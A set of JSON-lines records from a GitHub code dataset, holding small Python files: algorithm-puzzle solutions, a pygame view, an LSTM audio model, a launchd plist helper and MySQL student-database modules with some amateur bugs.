self.c))\r\n self.beta = acos((self.a**2 + self.c**2 - self.b**2) / (2 * self.a * self.c))\r\n self.gamma = acos((self.a**2 + self.b**2 - self.c**2) / (2 * self.a * self.b))\r\n self.angles = [round(x * 180 / pi, 3) for x in [self.alpha, self.beta, self.gamma]]\r\n\r\n\r\n# SSS: side-side-side\r\ndef sss(t1, t2):\r\n if len({x / y for x, y in zip(t1.sides, t2.sides)}) == 1:\r\n return True\r\n\r\n\r\n# AAA: angle-angle-angle\r\ndef aaa(t1, t2):\r\n a1 = set(t1.angles)\r\n a2 = set(t2.angles)\r\n if len(a1.intersection(a2)) >= 2:\r\n return True\r\n\r\n\r\n# SAS: side-angle-side\r\ndef sas(t1, t2):\r\n for obj in (t1, t2):\r\n obj.sides.sort()\r\n obj.angles.sort()\r\n \r\n s1, s2 = t1.sides, t2.sides\r\n a1, a2 = t1.angles, t2.angles\r\n\r\n if s1[0] / s2[0] == s1[1] / s2[1]:\r\n if a1[2] == a2[2]:\r\n return True\r\n if s1[1] / s2[1] == s1[2] / s2[2]:\r\n if a1[0] == a2[0]:\r\n return True\r\n if s1[2] / s2[2] == s1[0] / s2[0]:\r\n if a1[1] == a2[1]:\r\n return True\r\n return False\r\n\r\n\r\ndef similar_triangles(coords_1, coords_2):\r\n t1 = Triangle(coords_1)\r\n t2 = Triangle(coords_2)\r\n\r\n t1.calculate_sides()\r\n t1.calculate_angles()\r\n\r\n t2.calculate_sides()\r\n t2.calculate_angles()\r\n\r\n for t in (t1, t2):\r\n print(t.a, t.b, t.c)\r\n print([angle for angle in t.angles])\r\n\r\n if sss(t1, t2):\r\n return True\r\n\r\n if aaa(t1, t2):\r\n return True\r\n \r\n if sas(t1, t2):\r\n return True\r\n \r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n # These \"asserts\" are used for self-checking and not for an auto-testing\r\n assert similar_triangles([(0, 0), (1, 2), (2, 0)], [\r\n (3, 0), (4, 2), (5, 0)]) is True, 'basic'\r\n assert similar_triangles([(0, 0), (1, 2), (2, 0)], [(\r\n 3, 0), (4, 3), (5, 0)]) is False, 'different #1'\r\n assert similar_triangles([(0, 0), (1, 2), (2, 0)], [\r\n (2, 0), (4, 4), (6, 0)]) is True, 'scaling'\r\n assert similar_triangles([(0, 0), (0, 3), (2, 0)], [\r\n (3, 0), (5, 3), (5, 0)]) is True, 'reflection'\r\n assert similar_triangles([(1, 0), (1, 2), (2, 0)], [(\r\n 3, 0), (5, 4), (5, 0)]) is True, 'scaling and reflection'\r\n assert similar_triangles([(1, 0), (1, 3), (2, 0)], [(\r\n 3, 0), (5, 5), (5, 0)]) is False, 'different #2'\r\n assert similar_triangles(\r\n [[-3, -1], [3, 3], [-3, 1]], [[-3, -9], [9, 9], [3, 9]]) is True\r\n \r\n print(\"Coding complete? Let's try tests!\")\r\n\r\n \r\n\r\n","repo_name":"TvylorMvde/checkio-solutions","sub_path":"Similar-triangles/similar_triangles.py","file_name":"similar_triangles.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"17335780246","text":"from services.database_service import *\nfrom services.s3_service import *\nfrom datetime import date, datetime, time\n\ndef create_student(data):\n connection = get_database_connection()\n student_id = data.form['student_id']\n student_name = data.form['student_name']\n student_nric = data.form['student_nric']\n student_gender = data.form['student_gender']\n student_programme = data.form['student_programme']\n student_email = data.form['student_email']\n student_mobile = data.form['mobile_number']\n resume_file = data.files['resume']\n image_file = data.files['student_image']\n lecturer_id = \"p123\"\n \n insert_sql = \"INSERT INTO Student VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n cursor = connection.cursor()\n image_path = f\"students/{student_id}/profile.png\"\n resume_path = f\"students/{student_id}/resume.pdf\"\n uploadToS3(image_file, image_path)\n uploadToS3(resume_file, resume_path)\n image_url = get_object_url(image_path)\n resume_url = get_object_url(resume_path)\n try:\n cursor.execute(insert_sql, (student_id, student_name, student_nric, student_gender, student_programme,student_email, student_mobile,image_url,resume_url,lecturer_id))\n connection.commit()\n print(\"Successfully Uploading into Database\")\n uploadToS3(resume_file, f'students/{student_id}/resume.pdf')\n cursor.close()\n return True\n\n except Exception as e:\n cursor.close()\n print(str(e))\n return False\n\n finally:\n connection.close()\n\ndef get_student(student_id):\n connection = get_database_connection()\n get_sql = 'SELECT * FROM Student WHERE student_id = %s'\n cursor = connection.cursor()\n try:\n cursor.execute(get_sql, student_id)\n return cursor.fetchone()\n except Exception as e:\n print(str(e))\n return False\n finally:\n cursor.close()\n connection.close()\n \ndef get_all_students():\n connection = get_database_connection()\n\n query = \"SELECT * FROM Student\"\n cursor = connection.cursor()\n\n try:\n cursor.execute(query)\n return cursor.fetchall()\n except Exception as e:\n print(str(e))\n return False\n finally:\n cursor.close()\n connection.close()\n\n#write a function to remove student\ndef remove_student(student_id):\n connection = get_database_connection()\n\n delete_query = \"DELETE FROM Student WHERE student_id = %s\"\n cursor = connection.cursor()\n\n try:\n cursor.execute(delete_query, student_id)\n return True\n except Exception as e:\n print(str(e))\n return False\n finally:\n cursor.close()\n connection.close()\n\n#Write a function to create job application based on student_id and offer_id\ndef apply_company(student_id, offer_id):\n connections = get_database_connection()\n #Get date now\n dateNow = datetime.now()\n status = \"pending\"\n\n insert_query = \"INSERT INTO InternshipApplication VALUES(%s, %s, %s, %s)\"\n\n cursor = connections.cursor()\n try:\n cursor.execute(insert_query, (student_id, offer_id, dateNow.strftime(\"%Y-%m-%d %H:%M:%S\"), status))\n connections.commit()\n return True\n except Exception as e:\n print(str(e))\n return False\n finally:\n cursor.close()\n connections.close()\n \ndef get_detail_applied_internships(student_id):\n connection = get_database_connection()\n query = \"SELECT IO.job_title, IO.job_description, IO.allowance, C.company_name, IA.application_date FROM InternshipOffer IO INNER JOIN Company C ON IO.company_id = C.company_id INNER JOIN InternshipApplication IA ON IO.offer_id = IA.offer_id WHERE IA.student_id = %s\"\n cursor = connection.cursor()\n try:\n cursor.execute(query, student_id)\n return cursor.fetchall()\n except Exception as e:\n print(str(e))\n return False\n finally:\n cursor.close()\n connection.close()\n\n\ndef get_applied_internships(student_id):\n connection = get_database_connection()\n query = \"SELECT offer_id FROM InternshipApplication WHERE student_id = %s\"\n\n cursor = connection.cursor()\n try:\n cursor.execute(query, student_id)\n return cursor.fetchall()\n except Exception as e:\n print(str(e))\n return False\n finally:\n cursor.close()\n connection.close()\n","repo_name":"jason6356/aws-live","sub_path":"models/student_model.py","file_name":"student_model.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13447640840","text":"\"\"\"\nGiven a n x n matrix where each of the rows and columns are sorted in ascending order,\nfind the kth smallest element in the matrix.\nNote that it is the kth smallest element in the sorted order, not the kth distinct element.\nExample:\nmatrix = [\n [ 1, 5, 9],\n [10, 11, 13],\n [12, 13, 15]\n],\nk = 8,\nreturn 13.\n\"\"\"\nclass Solution(object):\n def kthSmallest(self, matrix, k):\n \"\"\"\n :type matrix: List[List[int]]\n :type k: int\n :rtype: int\n \"\"\"\n n = len(matrix)\n m = len(matrix[0])\n\n l = matrix[0][0]\n r = matrix[-1][-1] + 1\n\n while l < r:\n count = 0\n mid = (l+r)//2\n # 我们要找有多少个元素小于或等于mid\n count = self.get_count(matrix, mid, m)\n if count < k:\n l = mid + 1\n else:\n r = mid\n\n return l\n\n # 求count是,从左下往右上遍历,O(N)\n def get_count(self, matrix, target, m):\n i = 0\n j = m - 1\n counter = 0\n while j >= 0 and i < m:\n # !!! 小于等于,必须包含相等,即便等于目标值的数量\n if matrix[i][j] <= target:\n counter += j + 1\n #是按一列列来计算的,算完一列移动到下一列\n i += 1\n else:\n j -= 1\n return counter\n\n\"\"\"\nhttps://www.youtube.com/watch?v=1VkP3Ndu1C4&t=311s\n\"\"\"","repo_name":"Nexnull/Leetcoding","sub_path":"leetcode/Matrix/378. 有序矩阵中第K小的元素 .py","file_name":"378. 有序矩阵中第K小的元素 .py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"73790773444","text":"from itertools import permutations\n\n\ndef is_mapping(user_id, banned_id):\n for i in range(len(user_id)):\n if len(user_id[i]) != len(banned_id[i]):\n return False\n for j in range(len(user_id[i])):\n if banned_id[i][j] == '*':\n continue\n elif user_id[i][j] != banned_id[i][j]:\n return False\n return True\n\n\ndef solution(user_id, banned_id):\n answer = []\n for per_id in permutations(user_id, len(banned_id)):\n if is_mapping(per_id, banned_id):\n per_id = set(per_id)\n if per_id not in answer:\n answer.append(per_id)\n\n return len(answer)\n\n\nprint(solution([\"frodo\", \"fradi\", \"crodo\", \"abc123\", \"frodoc\"], [\"fr*d*\", \"abc1**\"]))","repo_name":"ketkat001/Programmers-coding","sub_path":"Level_4/불량사용자.py","file_name":"불량사용자.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70751945925","text":"n = int(input())\nmylist = [input() for word in range(n)]\n\n\n\ndef summa_values(word):\n word = list(word.upper())\n numbers = sum(list(map(lambda x: ord(x) - ord('A'), word)))\n return numbers\n\nresult = sorted(sorted(mylist), key=lambda x: summa_values(x))\nprint(*result, sep='\\n')\n","repo_name":"orlovsky-maya/Generation_Python_2","sub_path":"Functions/Exam/Part2/10. gematria_words.py","file_name":"10. gematria_words.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"73264305605","text":"from src.view.view import View\nfrom src.view.UI.text import Text\nfrom src.view.UI.button import Button\nfrom src.enum.command import Command\nfrom src.view.blinkingRect import BlinkingRect\nfrom .Game.player import Player\nimport pygame as py\n\nclass ViewLevel(View):\n \"\"\"Klasa widoku poziomu gry.\"\"\"\n def __init__(self, surface):\n super().__init__(surface)\n self.__all_sprites = py.sprite.Group()\n self.__paused = False\n self.__gameover = False\n self.__won = False\n self.__camera = None\n self.__pause_text = Text(\"Spauzowano.\", int(0.04 * self._surfaceSize[0]), (0.35 * self._surfaceSize[0], 0.05 * self._surfaceSize[1]))\n self.__won_text = Text(\"Gratulacje! Naciśnij Esc przy wybrać kolejny poziom.\", int(0.04 * self._surfaceSize[0]), (0.05 * self._surfaceSize[0], 0.05 * self._surfaceSize[1]))\n self.__lost_text = Text(\"YOU DIED. Naciśnij Esc by spróbować ponownie.\", int(0.04 * self._surfaceSize[0]), (0.05 * self._surfaceSize[0], 0.05 * self._surfaceSize[1]))\n self.__blink_enabled = 1\n\n self.__blinking_rects = []\n self.__blinking_rects.append(BlinkingRect(8, (0.01 * self._surfaceSize[0], 0.5 * self._surfaceSize[1]), (0.02 * self._surfaceSize[0], 0.02 * self._surfaceSize[0])))\n self.__blinking_rects.append(BlinkingRect(10, (0.5 * self._surfaceSize[0], 0.01 * self._surfaceSize[1]), (0.02 * self._surfaceSize[0], 0.02 * self._surfaceSize[0])))\n self.__blinking_rects.append(BlinkingRect(12, (0.97 * self._surfaceSize[0], 0.5 * self._surfaceSize[1]), (0.02 * self._surfaceSize[0], 0.02 * self._surfaceSize[0])))\n self.__blinking_rects.append(BlinkingRect(15, (0.5 * self._surfaceSize[0], 0.96 * self._surfaceSize[1]), (0.02 * self._surfaceSize[0], 0.02 * self._surfaceSize[0])))\n\n def render(self):\n self._surface.fill((200, 220, 250))\n if self.__paused == True:\n self.__pause_text.draw(self._surface)\n elif self.__gameover == True and self.__won == True:\n self.__won_text.draw(self._surface)\n elif self.__gameover == True and self.__won == False:\n self.__lost_text.draw(self._surface)\n else:\n for entity in self.__all_sprites:\n self._surface.blit(entity.surf, (entity.get_x() - self.__camera.x, entity.get_y() - self.__camera.y))\n if self.__blink_enabled == 1:\n for rect in self.__blinking_rects:\n rect.update();\n rect.draw(self._surface)\n #self._surface.blit(self.__player.get_surf(), self.__player.get_rect())\n\n py.display.flip()\n\n #v----GETTERY----v\n def set_player(self, player):\n self.__player = player\n\n def set_all_sprites(self, all_sprites):\n self.__all_sprites = all_sprites\n\n def set_paused(self, paused):\n self.__paused = paused\n\n def set_gameover(self, gameover):\n self.__gameover = gameover\n\n def set_won(self, won):\n self.__won = won\n\n def set_camera(self, camera):\n self.__camera = camera\n\n def set_blink_enabled(self, do_we_blink):\n self.__blink_enabled = do_we_blink","repo_name":"anmach/PProjektinator","sub_path":"PProjektinator 7000/Game/src/view/viewLevel.py","file_name":"viewLevel.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"12545433622","text":"import aioredis\nfrom tg_simple_math_bot.settings import Settings\n\ndef log_commands(func):\n async def wrapper(*args, **kwargs):\n key = str(kwargs.get(\"chat_id\") or (args[1] if len(args) > 1 else None))\n value = str(kwargs.get(\"command\") or (args[2] if len(args) > 2 else None))\n res = await func(*args, **kwargs)\n await redis_lpush(key, value)\n return res\n return wrapper\n\n\nasync def redis_lpush(key, value):\n redis = aioredis.from_url(Settings.REDIS_DSN)\n await redis.lpush(key, value)\n","repo_name":"amakridin/simple_calc_bot","sub_path":"tg_simple_math_bot/services/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38408277295","text":"import numpy as np\nimport theano\nimport theano.tensor as T\nimport lasagne\nfrom lasagne.layers import *\nfrom lasagne.updates import *\nfrom lasagne.nonlinearities import *\n\ndef Model(struct, seqlen):\n inp = InputLayer((None, seqlen, struct[0]))\n l = inp\n for s in struct:\n l = LSTMLayer(l, num_units=s, unroll_scan=False, precompute_input=True)\n l_shp = ReshapeLayer(l, (-1, struct[-1]))\n l_dense = DenseLayer(l_shp, num_units=struct[0], nonlinearity=linear)\n l_out = ReshapeLayer(l_dense, (-1, seqlen, struct[0]))\n return inp, l_out\n\nclass Batcher:\n def __init__(self, batch_dim, train_percentage=90):\n from Utilities.Sound import get_sound, sound_cut\n from Utilities.Pretreatment import Normalize\n data = sound_cut(get_sound(\"XqaJ2Ol5cC4\").astype(np.float32))\n cut = data.shape[0]*train_percentage//100\n self.pre = Normalize()\n self.pre.fit(data)\n self.train_data = self.pre.cmp(data[:cut])\n self.valid_data = self.pre.cmp(data[cut:])\n self.batch_dim = batch_dim\n self.n_batch = 0\n self.train_max = self.train_data.shape[0]-batch_dim[0]-batch_dim[1]*batch_dim[2]-1\n self.starts = np.arange(0, self.train_max-batch_dim[2], batch_dim[0])\n np.random.shuffle(self.starts)\n \n def get_batch(self):\n self.n_batch += 1\n batch_dim = self.batch_dim\n start = self.starts[self.n_batch%self.starts.shape[0]]\n x_data = np.asarray([self.train_data[start+i:start+i+batch_dim[1]*batch_dim[2]].reshape((batch_dim[1], batch_dim[2])) for i in range(batch_dim[0])])\n y_data = np.asarray([self.train_data[start+i+batch_dim[2]:start+i+(batch_dim[1]+1)*batch_dim[2]].reshape((batch_dim[1], batch_dim[2])) for i in range(batch_dim[0])])\n return x_data, y_data\n \n def get_valid_batch(self):\n batch_dim = self.batch_dim\n x_data = np.asarray([self.valid_data[i:i+batch_dim[1]*batch_dim[2]].reshape((batch_dim[1], batch_dim[2])) for i in range(batch_dim[0])])\n y_data = np.asarray([self.valid_data[i+batch_dim[2]:i+(batch_dim[1]+1)*batch_dim[2]].reshape((batch_dim[1], batch_dim[2])) for i in range(batch_dim[0])])\n return x_data, y_data\n \n def get_percentage(self):\n return 100*self.n_batch*self.batch_dim[0]//self.train_max\n \n def get_params(self):\n return self.n_batch\n \n def set_params(self, params):\n self.n_batch = params\n \nclass Curve:\n def __init__(self, train, valid, cost, clock):\n self.train = train\n self.valid = valid\n self.cost = cost\n self.clock = clock\n self.train_curve = []\n self.valid_curve = []\n self.clock_curve = []\n self.push()\n \n def push(self):\n self.train_curve += [self.cost(self.train[0], self.train[1])]\n self.valid_curve += [self.cost(self.valid[0], self.valid[1])]\n self.clock_curve += [self.clock()]\n \n def get_params(self):\n return [self.train_curve, self.valid_curve, self.clock_curve]\n \n def set_params(self, params):\n self.train_curve, self.valid_curve, self.clock_curve = params","repo_name":"duchesneaumathieu/IFT6266","sub_path":"Last try/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11336840904","text":"class Symbol:\n \"\"\"\n This is the Symbol class\n \"\"\"\n\n LOT_SIZE = \"lot_size\"\n TOP_3 = \"top_3\"\n OLD_OI = \"old_oi\"\n O_COST = \"o_cost\"\n COST = \"cost\"\n O_AVG = \"o_avg\"\n\n QTY = 'QTY'\n QTY_DELTA = 'D_QTY'\n TOP_3_DELTA = '% Top-3'\n O_COST_DELTA = '% O-Cost'\n COST_DELTA = '% Cost'\n AVG_DELTA = '% Avg'\n PRICE_DIFF = \"Diff\"\n\n TRADING_SYMBOL = \"trading_symbol\"\n INSTRUMENT_TOKEN = \"instrument_token\"\n EXCHANGE = \"exchange\"\n\n LAST_VOL = \"last_vol\"\n LAST_VOL_TIMESTAMP = \"last_vol_timestamp\"\n CURRENT_PRICE = \"Current\"\n LAST_AVG_PRICE = \"average_price\"\n NUMBER_OF_TICKS = \"total_hits\"\n\n def __init__(self, my_dict=None):\n\n self.name = None\n self.data = {\n self.LOT_SIZE: None, self.TOP_3: None, self.OLD_OI: None, self.O_COST: None, self.COST: None, self.O_AVG: None\n }\n\n self.zerodha_info = {\n self.TRADING_SYMBOL: None, self.INSTRUMENT_TOKEN: None, self.EXCHANGE: None,\n }\n\n self.curr_data = {\n self.LAST_VOL: 0, self.LAST_VOL_TIMESTAMP: None, self.CURRENT_PRICE: 0, self.LAST_AVG_PRICE: 0, self.NUMBER_OF_TICKS: 0\n }\n\n self.actionable = False\n\n if my_dict:\n for key in my_dict:\n setattr(self, key, my_dict[key])\n\n\n def __str__(self):\n return str({\n \"name\": self.name, \"data\": self.data, \"zerodha_info\": self.zerodha_info, \"curr_data\": self.curr_data, \"actionable\": self.actionable\n })\n\n def add_api_info(self, info):\n self.zerodha_info[self.TRADING_SYMBOL] = info[self.TRADING_SYMBOL]\n self.zerodha_info[self.INSTRUMENT_TOKEN] = info[self.INSTRUMENT_TOKEN]\n self.zerodha_info[self.EXCHANGE] = info[self.EXCHANGE]\n\n def gen_string_for_trade_xslx(self):\n data = self.data\n curr_data = self.curr_data\n\n if self.curr_data[self.LAST_VOL_TIMESTAMP] is None:\n return [data[self.OLD_OI],\n data[self.LOT_SIZE],\n data[self.TOP_3],\n data[self.O_COST],\n data[self.COST],\n data[self.O_AVG],\n self.name]\n\n return [curr_data[self.LAST_VOL_TIMESTAMP],\n data[self.OLD_OI],\n data[self.LOT_SIZE],\n data[self.TOP_3],\n data[self.O_COST],\n data[self.COST],\n data[self.O_AVG],\n self.name,\n curr_data[self.QTY_DELTA],\n curr_data[self.QTY],\n curr_data[self.TOP_3_DELTA],\n curr_data[self.O_COST_DELTA],\n curr_data[self.COST_DELTA],\n curr_data[self.AVG_DELTA],\n curr_data[self.LAST_AVG_PRICE],\n curr_data[self.PRICE_DIFF],\n \"Yes\" if self.actionable else \"\"]\n\n","repo_name":"kckanav/pollytrading","sub_path":"util/symbol.py","file_name":"symbol.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10319162797","text":"'''\nGood morning! Here's your coding interview problem for today.\n\nThis problem was recently asked by Google.\n\nGiven a list of numbers and a number k, return whether any two numbers from the list add up to k.\n\nFor example, given [10, 15, 3, 7] and k of 17, return true since 10 + 7 is 17.\n\nBonus: Can you do this in one pass?\n'''\n\ndef solution(nums, k):\n '''\n nums: list of integers\n k: value to be reached by summing any two elements in nums\n '''\n\n # For O(N^2) do this:\n for i in nums:\n for j in nums:\n if i+j == k:\n return True\n return False\n\ndef solution_eff(nums, k):\n '''\n nums: list of integers\n k: value to be reached by summing any two elements in nums\n '''\n # To obtain O(N) complexity, we can do this:\n\n nums = set(nums)\n for i in nums:\n if k-i in nums: return True\n return False\n\nprint(solution([10,15,3,7],10))\nprint(solution_eff([10,15,3,7],10))\n","repo_name":"flxsosa/CodingProblems","sub_path":"problem_1.py","file_name":"problem_1.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"29470945954","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport plistlib\n\nUSER = 1\nUSER_ADMIN = 2\nDAEMON_ADMIN = 3\nUSER_OS = 4\nDAEMON_OS = 5\n\nPLIST_LOCATIONS = {\n USER: \"~/Library/LaunchAgents\", # Per-user agents provided by the user.\n USER_ADMIN: \"/Library/LaunchAgents\", # Per-user agents provided by the administrator.\n DAEMON_ADMIN: \"/Library/LaunchDaemons\", # System-wide daemons provided by the administrator.\n USER_OS: \"/System/Library/LaunchAgents\", # Per-user agents provided by Mac OS X.\n DAEMON_OS: \"/System/Library/LaunchDaemons\", # System-wide daemons provided by Mac OS X.\n}\n\n\ndef compute_directory(scope):\n return os.path.expanduser(PLIST_LOCATIONS[scope])\n\n\ndef compute_filename(label, scope):\n return os.path.join(compute_directory(scope), label + \".plist\")\n\n\ndef discover_filename(label, scopes=None):\n \"\"\"\n Check the filesystem for the existence of a .plist file matching the job label.\n Optionally specify one or more scopes to search (default all).\n\n :param label: string\n :param scope: tuple or list or oneOf(USER, USER_ADMIN, DAEMON_ADMIN, USER_OS, DAEMON_OS)\n \"\"\"\n if scopes is None:\n scopes = list(PLIST_LOCATIONS)\n elif not isinstance(scopes, (list, tuple)):\n scopes = (scopes, )\n for thisscope in scopes:\n plistfilename = compute_filename(label, thisscope)\n if os.path.isfile(plistfilename):\n return plistfilename\n return None\n\n\ndef read(label, scope=None):\n with open(discover_filename(label, scope), \"rb\") as f:\n return plistlib.load(f)\n\n\ndef write(label, plist, scope=USER):\n \"\"\"\n Write the property list to file on disk and return filename.\n\n Creates the underlying parent directory structure if missing.\n :param plist: dict\n :param label: string\n :param scope: oneOf(USER, USER_ADMIN, DAEMON_ADMIN, USER_OS, DAEMON_OS)\n \"\"\"\n os.makedirs(compute_directory(scope), mode=0o755, exist_ok=True)\n fname = compute_filename(label, scope)\n with open(fname, \"wb\") as f:\n plistlib.dump(plist, f)\n return fname\n","repo_name":"infothrill/python-launchd","sub_path":"launchd/plist.py","file_name":"plist.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"99"} +{"seq_id":"26394470965","text":"import mysql.connector\nfrom mysql.connector import Error\nimport classes as clss\n\n\n\ndef connection_open():\n connection = mysql.connector.connect(host='localhost',\n database='mydb',\n user='root',\n password='dusan')\n if connection.is_connected():\n cursor = connection.cursor()\n return cursor, connection\n\ndef connection_close(cursor, connection):\n if connection.is_connected():\n cursor.close()\n connection.close()\n\n\n\n\n\n\n#Unosenje osnovnih podataka\n\n\ndef unesi_studenta(student):\n\n cursor,connection = connection_open();\n data = (student.ime, student.prezime)\n query = \"INSERT INTO student (student_Ime, student_prezime) VALUES ( %s, %s)\"\n try:\n cursor.execute(query, data)\n connection.commit()\n except Error as e:\n print(\"Error: \", e)\n finally:\n connection_close(cursor, connection)\n\n\ndef unesi_predmet(predmet):\n \n cursor, connection = connection_open()\n\n data = (predmet.naziv, predmet.broj_ESPB)\n query = \"INSERT INTO predmet (naziv_predmeta, broj_ESPB_bodova) VALUES (%s, %s)\"\n try:\n cursor.execute(query, data)\n connection.commit()\n except Error as e:\n print(\"Error: \", e)\n finally:\n connection_close(cursor, connection)\n\n\ndef unesi_profesora(profesor):\n\n cursor,connection = connection_open()\n data = (profesor.ime, profesor.prezime)\n query = \"INSERT INTO profesor (profesor_ime, profesor_prezime) VALUES (%s, %s)\"\n try:\n #upisivanje profesora u bazu\n cursor.execute(query, data)\n connection.commit()\n except Error as e:\n print(\"Error: \", e)\n finally:\n connection_close(cursor, connection)\n\ndef unesi_ispit(ispit):\n\n cursor, connection = connection_open()\n query = \"INSERT INTO ispit (predmet_idpredmet, profesor_idprofesor, datum) VALUES (%s, %s, %s)\"\n data = ( ispit.profesor.id, ispit.predmet.id, ispit.datum)\n \n try:\n cursor.execute(query, data)\n connection.commit()\n except Error as e:\n print(\"Error: \", e)\n finally:\n connection_close(cursor, connection)\n\n\n\n\n\n\n\n\n\n\n\n\n# ZASO U OVOJ METODI UZIMAMO I PREDMETID I STUDENTID????\n\ndef get_predmet_i_student_id(student, predmet):\n\n cursor, connection = connection_open()\n query_student = \"SELECT idStudent FROM student WHERE student_ime = %s AND student_prezime LIKE %s\"\n querry_predemt = \"SELECT idPredmet FROM predmet WHERE naziv_predmeta LIKE %s AND broj_ESPB_bodova LIKE %s\"\n try:\n # uzizamo id studenta \n cursor.execute(query_student,(student.ime, student.prezime))\n student_id = cursor.fetchall()\n # uzizamo id predmeta\n cursor.execute(querry_predemt, (predmet.naziv, predmet.broj_ESPB))\n predmet_id = cursor.fetchall()\n # Iz nekog razloga dobijam listu u nizu pa moram ovako da vracam vrednosti \n \n except Error as e:\n print(\"Error: \", e)\n finally:\n connection_close(cursor, connection)\n # Iz nekog razloga dobijam listu u nizu pa moram ovako da vracam vrednosti\n return (student_id[0][0], predmet_id[0][0])\n \n\ndef upis_na_predmet(student, predmet):\n\n ids = get_predmet_i_student_id(student, predmet)\n cursor,connection = connection_open()\n query = \"INSERT INTO student_has_predmet (student_idStudent, predmet_idPredmet) VALUES (%s, %s)\"\n try:\n cursor.execute(query, (ids[0], ids[1]))\n connection.commit()\n except Error as e:\n print(\"Error: \", e)\n finally:\n connection_close(cursor, connection)\n\n\ndef get_predmet(predmet_id):\n\n cursor, connection = connection_open()\n query = \"SELECT * FROM predmet WHERE idPredmet LIKE %s\"\n predmet = \"\"\n try:\n cursor.execute(query,(predmet_id,))\n predmet_list = cursor.fetchall()\n predmet = clss.predmet(predmet_list[0][1], predmet_list[0][2])\n \n except Error as e:\n print(\"Error: \", e)\n finally:\n connection_close(cursor, connection)\n return predmet\n\n\ndef get_profesor(profesor_id):\n\n cursor, connection = connection_open()\n query = \"SELECT * FROM profesor WHERE idProfesor LIKE %s\"\n profesor = \"\"\n try:\n cursor.execute(query, (profesor_id,))\n profesor_list = cursor.fetchall()\n profesor = clss.profesor(profesor_list[0][1], profesor_list[0][2])\n \n except Error as e:\n print(\"Erroer: \", e)\n finally:\n connection_close(cursor, connection)\n return profesor\n\ndef get_student(student_id):\n\n cursor, connection = connection_open()\n query = \"SELECT * FORM profesor WHERE idStudent LIKE %s\"\n try:\n cursor.execute(query, (student_id, ))\n student_list = cursor.fetchall()\n student = clss.pstudent(student_list[0][1], student_list[0][2])\n \n except Error as e:\n print(\"Error: \", e)\n finally:\n connection_close(cursor, connection)\n return student\n \ndef get_ispit(ispit_id):\n\n cursor, connection = connection_open()\n query = \"SELECT * FROM ispit WHERE idispit LIKE %s\"\n ispit_raw = \"\"\n\n try:\n cursor.execute(query, (ispit_id, ))\n ispit_raw = cursor.fetchall()\n \n except Error as e:\n print(\"Error: \", e)\n\n finally:\n connection_close(cursor, connection)\n return ispit_raw\n\n \n\ndef get_sve_studente():\n cursor, connection = connection_open()\n query = \"SELECT * FROM student\"\n\n try:\n cursor.execute(query)\n students = cursor.fetchall()\n except Error as e:\n print(\"Error: \", e)\n\n students_list = []\n \n for x in students:\n students_list.append(clss.student(x[0],x[1],x[2]))\n\n connection_close(cursor, connection)\n return students_list\n\n\ndef get_sve_profesore():\n cursor, connection = connection_open()\n query = \"SELECT * FROM profesor\"\n\n try:\n cursor.execute(query)\n profesori = cursor.fetchall()\n except Error as e:\n print(\"Error: \", e)\n\n proffesor_list = []\n \n for x in profesori:\n proffesor_list.append(clss.profesor(x[0], x[1], x[2]))\n\n connection_close(cursor, connection)\n return proffesor_list\n\n\ndef get_sve_predmete():\n cursor, connection = connection_open()\n query = \"SELECT * FROM predmet\"\n\n try:\n cursor.execute(query)\n predmeti = cursor.fetchall()\n except Error as e:\n print(\"Error: \", e)\n\n predmet_list = []\n \n for x in predmeti:\n predmet_list.append(clss.predmet(x[0], x[1], x[2]))\n\n connection_close(cursor, connection)\n return predmet_list\n\n\n\ndef get_sve_ispite():\n cursor, connection = connection_open()\n query = \"SELECT * FROM ispit\"\n\n try:\n cursor.execute(query)\n ispiti = cursor.fetchall()\n except Error as e:\n print(\"Error: \", e)\n\n ispiti_list = []\n \n for x in ispiti:\n ispiti_list.append(clss.ispit(x[0],x[1],x[2]))\n\n connection_close(cursor, connection)\n return ispiti_list\n\n \n\ndef upis_ocene(student, ispit, ocena):\n\n cursor, connection = connection_open()\n query = \"INSERTI INTO student_hes_ispit (student_idstudent, ispit_idispit, ocena) VALUES (%s, %s, %s)\"\n data = (student.id, ispit.id, ocena)\n\n try:\n cursor.execute(query, data)\n connection.commit()\n\n except Error as e:\n print(\"Error: \", e)\n finally:\n connection_close(cursor, connection)\n\n\ndef svi_ispiti_studenta(student):\n\n cursor, connection = connection_open()\n query = \"SELECT * FROM student_has_ispit WHERE student_idstudent LIKE %s\"\n data = (student.id, )\n ispiti = \"\"\n\n try:\n cursor.execute(query,data)\n ispiti = cursor.fetchall()\n\n except Error as e:\n print(\"Error: \", e)\n\n finally:\n connection_close(cursor, connection)\n \n for ispit in ispiti:\n print(ispit)\n\n return ispiti\n 